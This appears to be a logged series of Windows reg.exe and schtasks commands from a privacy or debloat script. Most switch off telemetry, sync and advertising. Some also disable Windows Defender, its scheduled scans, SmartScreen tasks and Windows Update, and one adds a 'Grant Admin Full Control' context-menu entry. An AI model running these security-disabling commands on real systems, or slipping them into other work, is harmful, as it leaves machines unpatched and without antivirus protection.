Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Input\TIPC" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\System" /v "AllowExperimentation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Bluetooth" /v "AllowAdvertising" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\SQMClient\Windows" /v "CEIPEnable" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Messaging" /v "AllowMessageSync" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Biometrics" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{C1D23ACC-752B-43E5-8448-8D0E519CD6D6}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSyncProviderNotifications" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2297E4E2-5DBE-466D-A12B-0F8286F0D9CA}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E5323777-F976-4f5b-9B55-B94699C46E44}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2EEF81BE-33FA-4800-9670-1CD474972C3F}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{52079E78-A92B-413F-B213-E8FE35712E72}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{7D7E8402-7C54-4821-A34E-AEEFD62DED93}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{D89823BA-7180-4B81-B50C-7E471E6121A3}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{8BC668CF-7728-45BD-93F8-CF2B3B41D7AB}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{9231CB4C-BF57-4AF3-8C55-FDA7BFCC04C5}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E390DF20-07DF-446D-B962-F5C953062741}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{992AFA70-6F47-4148-B3E9-3003349C1548}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\DiagTrack" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\dmwappushservice" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\WMDRM" /v "DisableOnline" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{A8804298-2D5F-42E3-9531-9C8C39EB29CE}" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\LooselyCoupled" /v "Value" /t REG_SZ /d "Deny" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CredUI" /v "DisablePasswordReveal" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "DoNotTrack" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "OptimizeWindowsSearchResultsForScreenReaders" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead" /v "FPEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes" /v "ShowSearchSuggestionsGlobal" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Browser" /v "AllowAddressBarDropdown" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy" /v "EnableEncryptedMediaExtensions" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync" /v "SyncPolicy" /t REG_DWORD /d "5" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Personalization" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\BrowserSettings" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Credentials" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Language" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Accessibility" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Windows" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableWindowsLocationProvider" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableLocationScripting" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Sensor\Permissions\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" /v "SensorPermissionState" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "DoNotShowFeedbackNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "SystemSettingsDownloadMode" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Speech" /v "AllowSpeechModelUpdate" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgrade" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgradePeriod" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpdatePeriod" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsStore\WindowsUpdate" /v "AutoDownload" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\7971f918-a847-4430-9279-4a52d1efe18d" /v "RegisteredWithAU" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\OneDrive" /v "PreventNetworkTrafficPreUserSignIn" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BingSearchEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Application Experience\StartupAppTask"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Application Experience\StartupAppTask" /disable"
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyUpload"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyUpload" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Autochk\Proxy"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Autochk\Proxy" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Maintenance\WinSAT"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Maintenance\WinSAT" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Application Experience\AitAgent"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Application Experience\AitAgent" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\DiskFootprint\Diagnostics"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\DiskFootprint\Diagnostics" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\PI\Sqm-Tasks"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\PI\Sqm-Tasks" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable
C:\Windows\system32\schtasks.exe
schtasks /end /tn "\Microsoft\Windows\AppID\SmartScreenSpecific"
C:\Windows\system32\schtasks.exe
schtasks /change /tn "\Microsoft\Windows\AppID\SmartScreenSpecific" /disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\SettingSync\BackgroundUploadTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /Disable schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ApplicationData\CleanupTemporaryState" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ApplicationData\DsSvcCleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\HypervisorFlightingTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Diagnosis\Scheduled" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\File Classification Infrastructure\Property Definition Sync" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Management\Provisioning\Logon" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Multimedia\SystemSoundsService" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\NlaSvc\WiFiTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\NetTrace\GatherNetworkInfo" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Offline Files\Background Synchronization" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Offline Files\Logon Synchronization" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Ras\MobilityManager" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Servicing\StartComponentCleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\SettingSync\BackupTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\SettingSync\NetworkStateChangeTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceAgentTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceManagerTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\User Profile Service\HiveUploadTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\WCM\WiFiTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Media Sharing\UpdateLibrary" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Wininet\CacheTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Maintenance Work" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Workplace Join\Automatic-Device-Join" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTask" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTaskLogon" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Driver Easy Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Office\Office ClickToRun Service Monitor" /Disable
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
